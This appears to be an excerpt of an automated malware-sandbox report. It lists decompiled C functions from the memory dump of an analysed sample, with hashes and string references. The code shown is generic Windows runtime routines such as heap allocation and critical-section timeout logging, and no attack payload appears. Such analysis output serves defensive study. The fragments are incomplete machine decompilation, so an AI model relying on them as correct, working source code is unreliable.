                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E016BAAB0() {
                                        				intOrPtr* _t4;
                                        
                                        				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                        				if(_t4 != 0) {
                                        					if( *_t4 == 0) {
                                        						goto L1;
                                        					} else {
                                        						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                        					}
                                        				} else {
                                        					L1:
                                        					return 0x7ffe0030;
                                        				}
                                        			}





                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                        • Instruction ID: 8f4f67cf23e050bc6633ef9f678a3e839b00bc75db4352b7df5f7634935bc1d4
                                        • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                        • Instruction Fuzzy Hash: 31D0E939752A80CFD617CB5DC994B5577A4BB44B84FC50490E901CB762E72CD984CA10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0172A537(intOrPtr _a4, intOrPtr _a8) {
                                        
                                        				return L016C8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                        			}



                                        0x0172a553

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                        • Instruction ID: 4d107108bae8e0c06c607253f9202f50f22896c688070af832b89be9fc70f2dd
                                        • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                        • Instruction Fuzzy Hash: 45C01232040148BBCB126F81CC00F157B2AE754B60F004014B5040B5618532D970EA44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E016ADB40() {
                                        				signed int* _t3;
                                        				void* _t5;
                                        
                                        				_t3 = L016C4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                        				if(_t3 == 0) {
                                        					return 0;
                                        				} else {
                                        					 *_t3 =  *_t3 | 0x00000400;
                                        					return _t3;
                                        				}
                                        			}






                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                        • Instruction ID: e3675e7a2fa68d0852b68ce9a1b476792d4cf71f7005614c2dc7c47e7eab4afe
                                        • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                        • Instruction Fuzzy Hash: ACC08C70280A01AAEB325F20CD01B103AA1BB10F01F8400A46301DA4F0DF78DC01EA00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E016AAD30(intOrPtr _a4) {
                                        
                                        				return L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                        			}



                                        0x016aad49

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                        • Instruction ID: 177b2a3863fa95651dbc4875d1bb53bf5cad1b6aea7c8410bb98e33aea60fbe4
                                        • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                        • Instruction Fuzzy Hash: CAC08C32080248BBC7126A45CD00F217B2AE7A0B60F000024F6040A6618932E860D998
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E016C3A1C(intOrPtr _a4) {
                                        				void* _t5;
                                        
                                        				return L016C4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                        			}




                                        0x016c3a35


                                        C-Code - Quality: 100%
                                        			E016B76E2(void* __ecx) {
                                        				void* _t5;
                                        
                                        				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                        					return L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                        				}
                                        				return _t5;
                                        			}




                                        0x016b76e4
                                        0x00000000
                                        0x016b76f8
                                        0x016b76fd


                                        C-Code - Quality: 100%
                                        			E016D36CC(void* __ecx) {
                                        
                                        				if(__ecx > 0x7fffffff) {
                                        					return 0;
                                        				} else {
                                        					return L016C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                        				}
                                        			}



                                        0x016d36d2
                                        0x016d36e8
                                        0x016d36d4
                                        0x016d36e5
                                        0x016d36e5


                                        C-Code - Quality: 100%
                                        			E016C7D50() {
                                        				intOrPtr* _t3;
                                        
                                        				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                        				if(_t3 != 0) {
                                        					return  *_t3;
                                        				} else {
                                        					return _t3;
                                        				}
                                        			}




                                        0x016c7d56
                                        0x016c7d5b
                                        0x016c7d60
                                        0x016c7d5d
                                        0x016c7d5d
                                        0x016c7d5d


                                        • Instruction ID: 80551082fcc5ac7bc9a5ab85709c5040f0c33baafff898855ac47295b5385010
                                        • Opcode Fuzzy Hash: 465b8b9ebf81518b9f2d622fe5b644d64a8816ed43093be1ee83e57124ce3662
                                        • Instruction Fuzzy Hash: 9B90026120144442D14066994C05B0F4109A7E1242F92C01DA5146554CC95598557761
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                        • Instruction ID: aa3e76fb3ee51c539d3c77821f9c814e4164cfc1b208e722a4c6ee76d31fa453
                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                        • Instruction Fuzzy Hash:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 53%
                                        			E0173FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                        				void* _t7;
                                        				intOrPtr _t9;
                                        				intOrPtr _t10;
                                        				intOrPtr* _t12;
                                        				intOrPtr* _t13;
                                        				intOrPtr _t14;
                                        				intOrPtr* _t15;
                                        
                                        				_t13 = __edx;
                                        				_push(_a4);
                                        				_t14 =  *[fs:0x18];
                                        				_t15 = _t12;
                                        				_t7 = E016ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                        				_push(_t13);
                                        				E01735720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                        				_t9 =  *_t15;
                                        				if(_t9 == 0xffffffff) {
                                        					_t10 = 0;
                                        				} else {
                                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                        				}
                                        				_push(_t10);
                                        				_push(_t15);
                                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                                        				return E01735720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                        			}











                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0173FDFA
                                        Strings
                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0173FE01
                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0173FE2B
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                        • API String ID: 885266447-3903918235
                                        • Opcode ID: 7452503d900f599bf1040efa2d151cad37b3b2e0a6794bd8db7fbec0cac05ed2
                                        • Instruction ID: 4a2a13a3650599f1a208bee0596b2a3399ff4e5f8d8fee6b38ded96a4ec2dbf8
                                        • Opcode Fuzzy Hash: 7452503d900f599bf1040efa2d151cad37b3b2e0a6794bd8db7fbec0cac05ed2
                                        • Instruction Fuzzy Hash: 5CF0F672640601BFEB211A45DC06F23BF5AEB84B70F140318F628561E2EA62F82086F5
                                        Uniqueness

                                        Uniqueness Score: -1.00%